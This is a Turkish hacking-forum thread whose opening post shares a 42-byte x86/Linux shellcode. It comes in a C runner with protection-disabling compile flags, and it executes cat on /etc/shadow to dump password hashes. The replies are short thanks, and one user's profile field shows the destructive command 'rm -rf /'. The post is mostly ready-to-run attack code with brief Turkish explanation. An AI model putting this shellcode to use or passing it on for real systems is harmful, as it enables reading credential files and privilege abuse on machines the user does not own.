İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

x86/Linux execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode

15-08-2016 10:23
#1
22a02 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2016
Nereden:
Assembly
Mesajlar:
10
Teşekkür (Etti):
0
Teşekkür (Aldı):
3
Konular:
10
Ticaret:
(0) %
#Gecmise Donus \w xd3.
(Son: 2)



Kod:
/*
 *             ::execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode
 *   __author__: xd3
 *     __date__: 15/9/22
 *   __format__: ELF 32 Bit
 * __platform__: x86/Linux
 *     __size__: 42 Bytes
 *    
 */
 
 /* Usage:
  * 
  * # gcc -fno-stack-protector -z execstack xd3.c -o xd3
  * # ./xd3
  * [~] Byte-Code Len: 42
  * .. $(cat /etc/passwd) output
  * #
  */

#include <stdio.h>
#include <string.h>

const unsigned char xd3[] = \
"\x6a\x0b\x58\x99\x52\x68"
"\x61\x64\x6f\x77\x68\x63"
"\x2f\x73\x68\x68\x2f\x2f"
"\x65\x74\x89\xe1\x52\x68"
"\x2f\x63\x61\x74\x68\x2f"
"\x62\x69\x6e\x89\xe3\x52"
"\x51\x53\x89\xe1\xcd\x80";


int main(){ 
    printf("[~] Byte-Code Len: %d\n", strlen(xd3));
    int (*sh3llc0de)();
    sh3llc0de = (int (*)()) xd3;
    (int)(*sh3llc0de)();
}


Soru & Cevap
Alıntı:
DarkmeteR´isimli üyeden Alıntı Mesajı göster
Bu nedir öğretirseniz sevinirim :0.
Bu tam olarak, Linux cekirdegi tabanli dagitimlarda yer alan, kullaniciya ozel bilgileri iceren (K. Adi, bitis tarihi, sifre..) "/etc/shadow" dosyasini okuyan bir bayt kodudur. Yapi olarak 11 numarali sistem cagrisini kullanarak (execve) argumanlari calistirir (/bin/cat, [/bin/cat, /etc//shadow], NULL). En genel tanimi ile bayt kodu, mimarisi onceden belirli makine talimatlaridir. Bayt anlaminda kucuk olmasi bunu ozel yapar. Sorun su ki, disassembly yapilmadigi surece pek okunabilir degildir, ayrica sifrelenmis olabilir. Bu sebeple kotu amacli birisi bayt kodu ayagina sizi kendi cikarlarinca kullanabilir. Her kaynaktaki bayt kodlarini dikkate almayiniz.

$ strace ./xd3
..
execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) = 0
..


Konu 22a02 tarafından (15-08-2016 10:39 Saat 10:39 ) değiştirilmiştir.
Hacknology Teşekkür etti.

15-08-2016 10:29
#2
DarkmeteR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2015
Nereden:
Eskişehir
Yaş:
18
Mesajlar:
512
Teşekkür (Etti):
236
Teşekkür (Aldı):
46
Konular:
76
Ticaret:
(0) %
Tamam bıraz arastırmayla buldum :0 "shellcode" elınıze saglık.
Kullanıcı İmzası
/ ____\_____ ____________ __| _/_____ ___.__.
\ __\ \__ \ \ / __ | \__ \ < | |
| | / \_| \// __ \_/ /_// __ __ |
|__ (____ /|__| (____ /\____ | (____ // ____|
/
Konu DarkmeteR tarafından (15-08-2016 10:33 Saat 10:33 ) değiştirilmiştir.
15-08-2016 10:30
#3
Hacknology - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2015
Nereden:
rm -rf /
Mesajlar:
2.709
Teşekkür (Etti):
946
Teşekkür (Aldı):
1227
Konular:
151
Ticaret:
(0) %
Ellerine sağlık
Kullanıcı İmzası
I surrender my soul
Odin hear my call

flag{Bur4si_b1r_0yun_park1}

hacknology@hacknologyroot:~/

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı